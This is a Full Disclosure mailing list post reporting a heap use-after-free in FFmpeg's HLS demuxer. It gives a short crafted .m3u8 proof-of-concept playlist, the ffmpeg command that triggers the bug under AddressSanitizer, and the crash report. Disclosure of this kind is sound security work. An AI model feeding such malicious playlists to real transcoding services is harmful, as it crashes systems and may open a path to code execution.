Full Disclosure mailing list archives

FFmpeg 7.0+ Heap Use-After-Free in FFmpeg HLS Demuxer (libavformat/utils.c)

From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 7 Sep 2025 01:31:45 -0400

Malformed .m3u8 playlists can trigger a heap use-after-free when the HLS
demuxer handles segment references. ASan reports access to freed memory
inside libavformat/utils.c:528. A crafted .m3u8 could allow remote
attackers to achieve denial of service (DoS), information disclosure, or
potentially remote code execution depending on heap state. (FFmpeg 7.0-8.0)

*Impact:*


   -

   Remote attackers can crash the transcoder with a malicious playlist.
   -

   Under certain heap layouts, this may be exploitable for arbitrary code
   execution.

*Proof of Concept:*
#EXTM3U
#EXTINF:10,
dummy.ts

UBSAN_OPTIONS=print_stacktrace=1 ASAN_OPTIONS=abort_on_error=1 ./ffmpeg -i
malicious.m3u8 -c copy out.mp4

ERROR: AddressSanitizer: heap-use-after-free on address 0x5080000000c8
READ of size 4
freed by thread T0 here: free()
previously allocated by thread T0 here: posix_memalign()
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

FFmpeg 7.0+ Heap Use-After-Free in FFmpeg HLS Demuxer (libavformat/utils.c) Ron E (Sep 08)